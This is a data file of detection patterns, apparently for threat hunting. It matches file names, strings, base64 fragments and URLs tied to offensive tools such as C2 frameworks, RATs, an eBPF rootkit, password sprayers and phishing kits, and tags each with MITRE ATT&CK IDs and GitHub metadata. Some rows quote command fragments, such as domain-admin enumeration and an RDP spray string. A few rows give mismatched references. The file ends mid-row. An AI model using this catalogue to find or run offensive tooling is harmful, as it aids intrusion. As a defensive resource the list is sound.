"*www.tor2web.org*",".{0,1000}www\.tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden 
Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*www.vsecurity.com/download/tools/*",".{0,1000}www\.vsecurity\.com\/download\/tools\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*www.wfuzz.org*",".{0,1000}www\.wfuzz\.org.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wxfuzz.bat*",".{0,1000}wxfuzz\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wxfuzz.py*",".{0,1000}wxfuzz\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*",".{0,1000}WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*",".{0,1000}WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*WytdIEluamVjdGVkIHRoZSA=*",".{0,1000}WytdIEluamVjdGVkIHRoZSA\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*-x *net group *Domain Admins* /domain*",".{0,1000}\-x\s.{0,1000}net\sgroup\s.{0,1000}Domain\sAdmins.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*X32_ClSp_Tcp_Exe.exe*",".{0,1000}X32_ClSp_Tcp_Exe\.exe.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*x64/CelestialSpark.asm*",".{0,1000}x64\/CelestialSpark\.asm.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*X64_ClSp_Tcp_Exe.exe*",".{0,1000}X64_ClSp_Tcp_Exe\.exe.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*x64PELoader/*.exe*",".{0,1000}x64PELoader\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*",".{0,1000}x64win\-DynamicNoNull\-WinExec\-PopCalc\-Shellcode.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*x86_64-unknown-uefi*",".{0,1000}x86_64\-unknown\-uefi.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*x86PELoader/*.exe*",".{0,1000}x86PELoader\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x86PELoader/test_agent_dll*",".{0,1000}x86PELoader\/test_agent_dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x86PELoader/test_agent_exe*",".{0,1000}x86PELoader\/test_agent_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x86PELoader/test_proxy_dll*",".{0,1000}x86PELoader\/test_proxy_dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is 
a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x86PELoader/test_proxy_exe*",".{0,1000}x86PELoader\/test_proxy_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x90skysn3k*",".{0,1000}x90skysn3k.{0,1000}","offensive_tool_keyword","Github Username","Github username known for password exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x90skysn3k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*x90skysn3k/brutespray*",".{0,1000}x90skysn3k\/brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*xato-net-10-million-usernames.txt*",".{0,1000}xato\-net\-10\-million\-usernames\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*X-C2-Beacon*",".{0,1000}X\-C2\-Beacon.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*xcopy /y /d *\msquic_schannel\msquic.dll*",".{0,1000}xcopy\s\/y\s\/d\s\s.{0,1000}\\msquic_schannel\\msquic\.dll.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","0","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*xdp/backdoor.h*",".{0,1000}xdp\/backdoor\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*xeno rat client.exe*",".{0,1000}xeno\srat\sclient\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*xeno rat server.exe*",".{0,1000}xeno\srat\sserver\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*xeno%20rat%20client.exe*",".{0,1000}xeno\%20rat\%20client\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*xeno%20rat%20server.exe*",".{0,1000}xeno\%20rat\%20server\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*Xeno_manager.exe*",".{0,1000}Xeno_manager\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*XenoUpdateManager.lnk*",".{0,1000}XenoUpdateManager\.lnk.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*X-Evilginx*",".{0,1000}X\-Evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*xforcered/CredBandit*",".{0,1000}xforcered\/CredBandit.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*xforcered/Detect-Hooks*",".{0,1000}xforcered\/Detect\-Hooks.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/Detect-Hooks","1","1","N/A","10","10","91","6","2021-07-22T20:13:16Z","2021-07-23T16:10:37Z" "*xforwardedfor.py*",".{0,1000}xforwardedfor\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" 
"*xFreed0m/RDPassSpray*",".{0,1000}xFreed0m\/RDPassSpray.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*xfreerdp /v*SOCtest*AllLegitHere*",".{0,1000}xfreerdp\s\/v.{0,1000}SOCtest.{0,1000}AllLegitHere.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*xfrm_poc*lucky0*",".{0,1000}xfrm_poc.{0,1000}lucky0.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*X-Gophish-Contact*",".{0,1000}X\-Gophish\-Contact.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. 
It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","0","N/A","N/A","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*XiaoliChan/wmiexec-Pro*",".{0,1000}XiaoliChan\/wmiexec\-Pro.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*xillwillx*",".{0,1000}xillwillx.{0,1000}","offensive_tool_keyword","Github Username","github repo username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xillwillx","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*xillwillx/tricky.lnk*",".{0,1000}xillwillx\/tricky\.lnk.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*XiphosResearch*",".{0,1000}XiphosResearch.{0,1000}","offensive_tool_keyword","exploits","Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.","T1203 - T1068 - T1062 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/XiphosResearch/exploits","1","0","N/A","N/A","10","1484","583","2023-10-06T19:57:20Z","2015-03-05T11:15:07Z" "*x-ishavocframework*",".{0,1000}x\-ishavocframework.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*xmendez/wfuzz*",".{0,1000}xmendez\/wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*XML-External-Entity-(XXE)-Payloads*",".{0,1000}XML\-External\-Entity\-\(XXE\)\-Payloads.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" 
"*xmr.2miners.com*",".{0,1000}xmr\.2miners\.com.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*XOR Shellcode Encoder.csproj*",".{0,1000}XOR\sShellcode\sEncoder\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*xor.exe *.txt*",".{0,1000}xor\.exe\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
